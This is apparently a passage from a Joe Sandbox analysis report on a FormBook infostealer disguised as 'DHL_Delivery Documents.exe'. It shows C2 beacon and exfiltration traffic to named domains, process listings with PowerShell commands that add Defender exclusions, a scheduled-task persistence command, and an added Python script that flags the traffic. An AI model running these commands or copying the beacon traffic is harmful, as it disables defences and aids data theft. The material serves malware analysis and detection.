                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2WnHi2%2Fo01hPAdXMSd%2BMF9RsM2LjNCZc931bGtsT0%2BpaQ9liOpp4p1QAGFrE6%2BJ%2B%2F0GmQF0%2BrXcPteoLI74c2xDdEFGBLHQ21583ib450RLHFXQmKPbBNCNGS3sWZ2m9TndGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88871cc21cd58c45-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: adL=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~b90


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49714 | 172.67.214.17 | 80 | 1352 | C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
Timestamp | Bytes transferred | Direction | Data
May 23, 2024 20:29:37.797410965 CEST | 511 | OUT | GET /0eyj/?Urf=xbMFueOYBXYurIwiepFnO71qLlyP3ujEHyf23sFAywtga3bqBhIKPev0K8adiimIvdV9j6fOUj2Pc2CkptCWxRwbiV0KWskIok5o/u5VAK+QdqKfe3RHCloueJvNBgPjzg==&pP=fPyhqn_HwdI HTTP/1.1
                      Host: www.alexbruma.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-US
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
May 23, 2024 20:29:38.578330994 CEST | 810 | IN | HTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:29:38 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Transfer-Encoding: chunked
                      Connection: close
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goUQgH9ohKt1fmph30M6OlTfSSoEVX%2BnI%2BjIrBrD%2F3AN%2BT5WbfBSA7l9RjOMhkuzkRCPVlWXzuEnxV3Aurtf3H7jwG3Z4%2BH55oS6ywv69uZWnVIYB2k2LS0mkZzUWjnXkfzZKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88871cd1ee21423f-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 65 79 6a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0eyj/ was not found on this server.</p></body></html>0


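The five sessions above share the traits the ET PRO signature in the Snort table keys on, and the same traits are enough for a plain-text detector. The following example is added here and is not Joe Sandbox code: it treats the DNS answers and four of the captured requests (session 3 is truncated on the page and left out) as input and scores them on what is visible in the tables. Every request carries the same outdated Chrome 44 User-Agent string; every path is a four-character segment between slashes; the only parameter is a two- or three-letter key followed by bare standard base64 (a browser form encoder would percent-encode '+', '/' and '=' as %2B, %2F and %3D); and the two POST bodies to www.alexbruma.com start with the same 12 characters, which points to a fixed plaintext header encrypted under a fixed key with no per-message nonce. The indicator names, the input layout and all function names are this example's own.

```python
import base64
import binascii
import os
import re

# Added example, not Joe Sandbox code. DNS_ANSWERS and HTTP_REQUESTS are
# constructed from the DNS and HTTP tables of this report; the field names,
# indicator names and functions are this example's own.

# (queried name, reply code) from the DNS answer table.
DNS_ANSWERS = [
    ("www.bookingshop01.top", "Server failure (2)"),
    ("www.uzonedich.com", "No error (0)"),
    ("www.7egiy1.cfd", "Name error (3)"),
    ("www.alexbruma.com", "No error (0)"),
    ("www.prospin.click", "Name error (3)"),
]

# The User-Agent every request in the report carries.
REPORT_UA = ("Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36")

# Sessions 0, 1, 2 and 4; session 3 is truncated on the page and omitted.
HTTP_REQUESTS = [
    {"method": "GET", "host": "www.uzonedich.com", "ua": REPORT_UA, "body": "",
     "target": "/ew0m/?Urf=R9oUCj0Kr0tjZSdhKcVG72tknPUSe2YfdfzFTAWqH1uH1Z8SvVf85mUnaA3f99ILEbWrEuJ+fmKqJVRYQbENh1wm0L+Vjxgcu0XuSfZ61wplFH4xX6XBL/wdg7Pf2vzXJQ==&pP=fPyhqn_HwdI"},
    {"method": "POST", "host": "www.alexbruma.com", "ua": REPORT_UA, "target": "/0eyj/",
     "body": "Urf=8ZkltrS4BEEM4LYIUbl+OuhsIFrZnq6KA2HU6r5D/iISFmXiI1w6MPjoMOnhzkuaga07rqeRUnCIZX+L0/+wx1cEi1MfZrRU4wpQqdRcXqmTQdKbCmsOPHklfc3ldxuOo1XbUtRJBev1+SUkNrSfxERcp0Xu8wcOUBFNA60cQROSOv3z17VLjcuJhOoNRYKpcCrWAR4="},
    {"method": "POST", "host": "www.alexbruma.com", "ua": REPORT_UA, "target": "/0eyj/",
     "body": "Urf=8ZkltrS4BEEMiqoIX4N+LOhvDlrZuK6OA2LU6pVT+WkSFGniP0w6PPjoZ+mru0uRgaxGroKRUjqIZWOL1O+/+FcGvVMZTLRU4wpQqdV6Xq+TQtabF3sPDnkiPM3lZxuSo1X5UpRnBcH1+TkkN+yc+ERGmUWb/C9hWxxBdqhNPwWQC5aZvZdjw8Cxxdg6AorAGh7meGtMKDkdKNO6RtcE2TFGMSl1"},
    {"method": "GET", "host": "www.alexbruma.com", "ua": REPORT_UA, "body": "",
     "target": "/0eyj/?Urf=xbMFueOYBXYurIwiepFnO71qLlyP3ujEHyf23sFAywtga3bqBhIKPev0K8adiimIvdV9j6fOUj2Pc2CkptCWxRwbiV0KWskIok5o/u5VAK+QdqKfe3RHCloueJvNBgPjzg==&pP=fPyhqn_HwdI"},
]

FOUR_CHAR_PATH = re.compile(r"^/[A-Za-z0-9]{4}/$")
# A 2-3 letter key followed by bare standard base64. A browser-built form
# body would percent-encode '+', '/' and '='; this traffic leaves them raw.
RAW_B64_PARAM = re.compile(r"^[A-Za-z]{2,3}=([A-Za-z0-9+/]{16,}={0,2})$")


def dns_summary(answers):
    """Split queried names into resolved and failed. Three of this sample's
    five candidate domains never resolve, the shape of a C2 list padded with
    decoys."""
    resolved = sorted(n for n, rc in answers if rc.startswith("No error"))
    failed = sorted(n for n, rc in answers if not rc.startswith("No error"))
    return {"resolved": resolved, "failed": failed}


def first_param(req):
    """First key=value pair of the request: the query for GET, the form body
    for POST. Empty string if there is none."""
    _, _, query = req["target"].partition("?")
    source = query if req["method"] == "GET" else req["body"]
    return source.split("&", 1)[0]


def b64_payload_len(param):
    """Decoded byte length of the raw-base64 value in a key=value pair, or
    None when the value is not well-formed standard base64."""
    m = RAW_B64_PARAM.match(param)
    if not m:
        return None
    try:
        return len(base64.b64decode(m.group(1)))
    except (binascii.Error, ValueError):
        return None


def formbook_indicators(req):
    """Names of the patterns a single request matches, in a fixed order."""
    reasons = []
    if req["ua"] == REPORT_UA:
        reasons.append("legacy-chrome44-ua")
    if FOUR_CHAR_PATH.match(req["target"].partition("?")[0]):
        reasons.append("four-char-path")
    if b64_payload_len(first_param(req)) is not None:
        reasons.append("raw-base64-param")
    return reasons


def constant_prefix(requests, host):
    """Longest common prefix of the base64 bodies POSTed to one host. A shared
    prefix across messages means a fixed plaintext header and a cipher with no
    per-message IV: identical bytes encrypt to identical bytes."""
    values = [RAW_B64_PARAM.match(first_param(r)).group(1)
              for r in requests if r["host"] == host and r["method"] == "POST"]
    return os.path.commonprefix(values)


def triage(answers, requests):
    """One summary dict a triage note can be written from."""
    return {
        "dns": dns_summary(answers),
        "requests": [(r["method"], r["host"], formbook_indicators(r)) for r in requests],
        "alexbruma_post_prefix": constant_prefix(requests, "www.alexbruma.com"),
    }


if __name__ == "__main__":
    for key, value in triage(DNS_ANSWERS, HTTP_REQUESTS).items():
        print(key, value)
```

The decoded GET payload to www.uzonedich.com is 97 bytes, the two POST bodies 149 and 165 bytes, so the beacon and the exfiltration messages differ only in length, not in framing. Note that the Snort table shows a single alert, on the GET check-in; the POSTs that carry the larger payloads fired nothing, which is exactly where a home-grown rule on the bare-base64 form body earns its keep.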

                      Target ID:0
                      Start time:14:27:44
                      Start date:23/05/2024
                      Path:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\DHL_Delivery Documents.exe"
                      Imagebase:0x9d0000
                      File size:939'520 bytes
                      MD5 hash:9C930DA2AC186C1F945A7BC74AA491ED
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:14:27:46
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
                      Imagebase:0xdf0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:3
                      Start time:14:27:46
                      Start date:23/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:14:27:46
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
                      Imagebase:0xdf0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:5
                      Start time:14:27:46
                      Start date:23/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:6
                      Start time:14:27:47
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"
                      Imagebase:0x7c0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:7
                      Start time:14:27:47
                      Start date:23/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:8
                      Start time:14:27:48
                      Start date:23/05/2024
                      Path:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\DHL_Delivery Documents.exe"
                      Imagebase:0xfa0000
                      File size:939'520 bytes
                      MD5 hash:9C930DA2AC186C1F945A7BC74AA491ED
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      Target ID:9
                      Start time:14:27:49
                      Start date:23/05/2024
                      Path:C:\Users\user\AppData\Roaming\YybGLWQSx.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\YybGLWQSx.exe
                      Imagebase:0x90000
                      File size:939'520 bytes
                      MD5 hash:9C930DA2AC186C1F945A7BC74AA491ED
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 55%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:10
                      Start time:14:27:50
                      Start date:23/05/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff6ef0c0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:11
                      Start time:14:27:53
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp"
                      Imagebase:0x7c0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:12
                      Start time:14:27:53
                      Start date:23/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:13
                      Start time:14:27:54
                      Start date:23/05/2024
                      Path:C:\Users\user\AppData\Roaming\YybGLWQSx.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
                      Imagebase:0xae0000
                      File size:939'520 bytes
                      MD5 hash:9C930DA2AC186C1F945A7BC74AA491ED
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:17
                      Start time:14:28:36
                      Start date:23/05/2024
                      Path:C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe"
                      Imagebase:0x600000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      Target ID:18
                      Start time:14:28:37
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\setx.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\setx.exe"
                      Imagebase:0x870000
                      File size:46'592 bytes
                      MD5 hash:5B700BC00E451033B2F9EEF349A91D1C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:false

                      Target ID:19
                      Start time:14:28:50
                      Start date:23/05/2024
                      Path:C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe"
                      Imagebase:0x600000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Has exited:false

                      Target ID:20
                      Start time:14:29:10
                      Start date:23/05/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff79f9e0000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true


                        Execution Graph

                        Execution Coverage:8.6%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:53
                        Total number of Limit Nodes:9
                        execution_graph: [rendered graph not recoverable; nodes call GetModuleHandleW, LoadLibraryExW, DuplicateHandle, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId and CreateActCtxA]

                        Control-flow Graph (function at 2c1d449; rendered graph not recoverable)
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 02C1D4D6
                        • GetCurrentThread.KERNEL32 ref: 02C1D513
                        • GetCurrentProcess.KERNEL32 ref: 02C1D550
                        • GetCurrentThreadId.KERNEL32 ref: 02C1D5A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: c0f07ef3d999ec60db859492e7e5ec6ba691a3e5320ac58db923a1097890b9d1
                        • Instruction ID: 8b5e01e37826f3f6b8869a38b869146f522126bc42487b6794b1692da0cac580
                        • Opcode Fuzzy Hash: c0f07ef3d999ec60db859492e7e5ec6ba691a3e5320ac58db923a1097890b9d1
                        • Instruction Fuzzy Hash: 255169B0D00309DFDB14DFA9D548B9EBBF1EF88308F20849AE40AA7350D7349945CB65

                        Control-flow Graph (function at 2c1d458; rendered graph not recoverable)
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 02C1D4D6
                        • GetCurrentThread.KERNEL32 ref: 02C1D513
                        • GetCurrentProcess.KERNEL32 ref: 02C1D550
                        • GetCurrentThreadId.KERNEL32 ref: 02C1D5A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 5b1c25c6b219a3946756909cc05de8000b10ca07b1f5a5cd61c78a04c7ce6cc9
                        • Instruction ID: ce037ff056268b3fa636476bb5cbcd3b9b7fc3842303cb69e24a12d0ef0dc64f
                        • Opcode Fuzzy Hash: 5b1c25c6b219a3946756909cc05de8000b10ca07b1f5a5cd61c78a04c7ce6cc9
                        • Instruction Fuzzy Hash: 1C5135B0D003099FDB14DFAAD549B9EBBF1EF89308F20845AE41AA7350D734A985CB65

                        Control-flow Graph (function at 2c1adc8; rendered graph not recoverable)
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02C1B01E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 903ed1142caa3762cac38edc25cc4371d0a7e916633db308baccdd0ed620c3b5
                        • Instruction ID: 2546b197bdf27fd526c2af54b03d82d744fccc8f7bada2d8a86ce078d4d25a7b
                        • Opcode Fuzzy Hash: 903ed1142caa3762cac38edc25cc4371d0a7e916633db308baccdd0ed620c3b5
                        • Instruction Fuzzy Hash: DC8178B0A01B458FDB24DF2AD44575ABBF2FF89304F008A2DD48AD7A40D735E956DB90

                        Control-flow Graph (function at 2c1590c; rendered graph not recoverable)
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02C159C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 8bd39086ed8b41ce7885037fd30fb6b0a9d24b1d73c23701c64754dfa078ad3e
                        • Instruction ID: 3728e897cc5ccc144fde592ff74dd391ebed08a2e3e20a0fc656ddd3f209df43
                        • Opcode Fuzzy Hash: 8bd39086ed8b41ce7885037fd30fb6b0a9d24b1d73c23701c64754dfa078ad3e
                        • Instruction Fuzzy Hash: 525113B1D00619CFDB20CFA9C8857DEBBF5BF89304F60806AD409AB251D775698ACF91

                        Control-flow Graph (function at 2c1449c; rendered graph not recoverable)
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02C159C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 9cd2b289f757f443951733bb991ee8b57d43f84b90c0cdd79760208cc0650b47
                        • Instruction ID: 82c7eceae579ad64517969e8cb6245d0054d300df64306dadfc43ed97d9c1b7e
                        • Opcode Fuzzy Hash: 9cd2b289f757f443951733bb991ee8b57d43f84b90c0cdd79760208cc0650b47
                        • Instruction Fuzzy Hash: 3D41F5B0D0071DCBDB24CFA9C88579EBBB5FF85304F60806AD409AB251DB71694ACF91

                        Control-flow Graph (function at 2c1d698; rendered graph not recoverable)
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C1D727
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: aa21b7637c50aa0ad553972326d6ef18c6fe55672d7e56658e5144320b503e74
                        • Instruction ID: 7d3c62a3948551cfd966595d4561d6168f25cc1a01381a5a3c70000db35ee249
                        • Opcode Fuzzy Hash: aa21b7637c50aa0ad553972326d6ef18c6fe55672d7e56658e5144320b503e74
                        • Instruction Fuzzy Hash: 993157B5C0024A9FCB10CFA9D484ADEFFF4EF49320F14815AE954A7250D374A941DFA1

                        Control-flow Graph (function at 2c1d6a0; rendered graph not recoverable)
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C1D727
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
